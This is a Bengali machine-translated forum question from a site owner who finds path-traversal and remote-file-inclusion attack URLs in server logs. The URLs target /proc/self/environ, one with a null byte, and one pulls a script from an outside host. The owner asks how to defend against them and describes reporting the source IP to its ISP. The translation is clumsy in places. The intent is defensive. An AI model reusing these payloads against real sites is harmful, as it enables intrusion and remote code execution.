আমার ৪৪৪ টি লগের মধ্যে দিয়ে আমি নীচের দুটি ইউআরএল লক্ষ্য করেছি, উভয়ই একবারে ঘটেছে:
/library.php=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ
এবং
/library.php=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00
প্রশ্নে পাতা, library.php
একটি প্রয়োজন type
আধা ডজন বিভিন্ন গ্রহণযোগ্য মান পরিবর্তনশীল, এবং তারপর একটি id
পরিবর্তনশীল। সুতরাং একটি বৈধ URL হতে পারে
library.php?type=Circle-K&id=Strange-Things-Are-Afoot
এবং আইডিগুলি সমস্ত mysql_real_escape_string
ডেটাবেস কোয়েরি ব্যবহার করার আগে চালানো হয় ।
আমি দুর্বৃত্ত, তবে আমার কাছে মনে হয় যে এই দুটি লিঙ্কই ওয়েবরটের বিরুদ্ধে সহজ আক্রমণ?
1) 404 ছাড়াও এই ধরণের জিনিসগুলি থেকে কীভাবে সুরক্ষিত রাখা যায়?
2) আমি কি আইপি (গুলি) কে দায়ী করতে পারি?
সম্পাদনা করুন: এটি সবেমাত্র লক্ষ্য করেছেন
/library.php=http://www.basfalt.no/scripts/danger.txt
সম্পাদনা 2: সমস্ত 3 টি আক্রমণটির জন্য আপত্তিজনক আইপি হ'ল 216.97.231.15
লস অ্যাঞ্জেলেসের ঠিক বাইরে অবস্থিত লুনার পেজ নামে একটি আইএসপি সনাক্ত করে।
সম্পাদনা 3: আমি শুক্রবার সকালে স্থানীয় সময় আইএসপি কল করার সিদ্ধান্ত নিয়েছি এবং আমি ফোনে যাকে পেতে পারি তার সাথে বিষয়টি নিয়ে আলোচনা করব। আমি 24 ঘন্টা বা তার বেশি সময়ে এখানে ফলাফল পোস্ট করব।
সম্পাদনা 4: আমি তাদের প্রশাসকদের ইমেল করা শেষ করেছিলাম এবং তারা প্রথমে প্রতিক্রিয়া জানিয়েছিল যে "তারা এটিকে দেখছিল" এবং তারপরে একদিন পরে "এই সমস্যাটি এখনই সমাধান করা উচিত।" দুঃখের সাথে আর কোনও বিবরণ নেই।
type
স্ক্রিপ্ট ব্যবহার করার অন্তর্ভুক্ত বলে (যদিও একটি মাধ্যমে IF $_GET['type'] == 'thing') {} ESLE...
, না মত সরাসরি লিঙ্ক হিসাবে include 'type.php'
) এবং id
mysql_real_escape_string মাধ্যমে চালানো হয়েছে এবং যে প্রশ্নের জন্য ব্যবহৃত হয়। এটা জেনেও কি আমি এখনও নিরাপদ?